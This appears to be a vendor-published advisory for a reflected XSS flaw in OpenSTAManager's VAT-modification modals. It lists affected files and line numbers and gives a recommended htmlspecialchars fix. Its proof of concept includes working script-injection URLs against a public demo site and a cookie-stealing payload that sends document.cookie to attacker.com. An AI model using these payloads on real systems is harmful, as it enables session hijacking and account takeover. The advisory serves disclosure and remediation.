CVE-2026-24415

CVE-2026-24415 is a medium-severity cross-site scripting (XSS) vulnerability in devcode-it/openstamanager (composer), affecting versions < 2.9.8. It is fixed in 2.9.8.

Summary

Multiple Reflected Cross-Site Scripting (XSS) vulnerabilities in OpenSTAManager v2.9.8 allow unauthenticated attackers to execute arbitrary JavaScript code in the context of other users' browsers through crafted URL parameters, potentially leading to session hijacking, credential theft, and unauthorized actions.

Vulnerable Parameter: righe (GET)

Details

OpenSTAManager v2.9.8 contains multiple Reflected XSS vulnerabilities in invoice/order/contract modification modals. The application fails to properly sanitize user-supplied input from the righe GET parameter before reflecting it in HTML output.

Vulnerable Code Location:
File: /modules/contratti/modals/modifica_iva.php (Line 125)

<input type="hidden" name="righe" value="<?php echo $_GET['righe']; ?>">

The $_GET['righe'] parameter is directly echoed into the HTML value attribute without any sanitization using htmlspecialchars() or equivalent functions. This allows an attacker to break out of the attribute context and inject arbitrary HTML/JavaScript.

All Affected Files:

  1. /modules/contratti/modals/modifica_iva.php - Line 125, Line 167
  2. /modules/preventivi/modals/modifica_iva.php - Line 125, Line 167
  3. /modules/fatture/modals/modifica_iva.php - Line 121, Line 161
  4. /modules/ddt/modals/modifica_iva.php - Line 125, Line 167
  5. /modules/ordini/modals/modifica_iva.php - Line 125, Line 167
  6. /modules/interventi/modals/modifica_iva.php - Line 125, Line 167

PoC

Prerequisites:

  • Running instance of OpenSTAManager v2.9.8
  • Valid admin credentials (username: admin, password: admin for test instance)

Step 1: Login

curl -c cookies.txt -X POST 'http://localhost:8081/index.php?op=login' \
  -d 'username=admin&password=admin'

Step 2: Trigger XSS
Navigate to the following URL in a browser (or use curl with cookies):

http://localhost:8081/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.domain)</script>

Tested URLs (All vulnerable):

  • https://demo.osmbusiness.it/modules/contratti/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
  • https://demo.osmbusiness.it/modules/preventivi/modals/modifica_iva.php?righe=1"><script>alert(document.cookie)</script>
  • https://demo.osmbusiness.it/modules/fatture/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
  • https://demo.osmbusiness.it/modules/ddt/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
  • https://demo.osmbusiness.it/modules/ordini/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>
  • https://demo.osmbusiness.it/modules/interventi/modals/modifica_iva.php?righe="><script>alert(document.cookie)</script>

Expected Result:
JavaScript alert popup displays showing the current session cookie, confirming code execution.

HTML Output (verified on live instance):

<input type="hidden" name="righe" value=""><script>alert(document.cookie)</script>">

Verification:

Alternative Payloads:
Session stealing: "><script>fetch('https://attacker.com/?c='+document.cookie)</script>

Impact

Affected Users: All authenticated users with access to contracts, invoices, quotes, or orders modules.

Attack Scenario:

  1. Attacker crafts malicious URL with XSS payload
  2. Attacker sends URL to victim via email/chat/phishing
  3. Victim (authenticated user) clicks the link
  4. Malicious JavaScript executes in victim's browser context
  5. Attacker can:
    • Steal session cookies → Full account takeover
    • Perform actions on behalf of victim (create/modify/delete records)
    • Steal CSRF tokens and bypass CSRF protection
    • Redirect to phishing page
    • Inject keylogger to capture sensitive data
    • Modify page content to trick user into revealing credentials

Recommended Fix:

<input type="hidden" name="righe" value="<?php echo htmlspecialchars($_GET['righe'], ENT_QUOTES, 'UTF-8'); ?>">

Apply this fix to all affected files listed in Details section.

Untrusted input is rendered as active markup in a victim's browser, which can run script in their session. Typical impact: session or credential theft, and actions taken as the user.

Affected versions

devcode-it/openstamanager (< 2.9.8)

Security releases

devcode-it/openstamanager → 2.9.8 (composer)

Kodem intelligence

Severity tells you how bad this could be in the worst case. It does not tell you whether you are exposed. Exploitability and impact are functions of runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A vulnerable package can sit in your dependency tree and never run.

Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter. Kodem's runtime-powered SCA identifies whether this CVE is reachable in your applications.

See it in your environment

Remediation advice

Upgrade devcode-it/openstamanager to 2.9.8 or later to resolve this vulnerability.

Kodem Kai can prioritize this vulnerability in your dependency tree and generate a fix recommendation.

Frequently Asked Questions

  1. What is CVE-2026-24415? CVE-2026-24415 is a medium-severity cross-site scripting (XSS) vulnerability in devcode-it/openstamanager (composer), affecting versions < 2.9.8. It is fixed in 2.9.8. Untrusted input is rendered as active markup in a victim's browser, which can run script in their session.
  2. Which versions of devcode-it/openstamanager are affected by CVE-2026-24415? devcode-it/openstamanager (composer) versions < 2.9.8 is affected.
  3. Is there a fix for CVE-2026-24415? Yes. CVE-2026-24415 is fixed in 2.9.8. Upgrade to this version or later.
  4. Is CVE-2026-24415 exploitable, and should I be worried? Whether CVE-2026-24415 is exploitable in your environment depends on whether the vulnerable code is present and reachable. A CVSS score is a worst-case rating; it does not account for your specific deployment, configuration, or usage patterns. Kodem, an Intelligent Application Security platform, uses runtime intelligence to show which vulnerabilities actually execute in production, so you can focus on the ones that represent real risk. Get a demo
  5. What actually determines whether CVE-2026-24415 is exploitable, and how bad it is? Exploitability and impact are not fixed properties of a CVE. They depend on runtime truth: whether the vulnerable code is present, reachable, and actually executes in your application. A high CVSS score on a dependency that never runs is not the same as real risk. Kodem, an Intelligent Application Security platform, uses runtime intelligence to reveal which vulnerabilities actually execute in production, so teams prioritize the ones that genuinely matter.
  6. How do I fix CVE-2026-24415? Upgrade devcode-it/openstamanager to 2.9.8 or later.

Other vulnerabilities in devcode-it/openstamanager

Stop the waste.
Protect your environment with Kodem.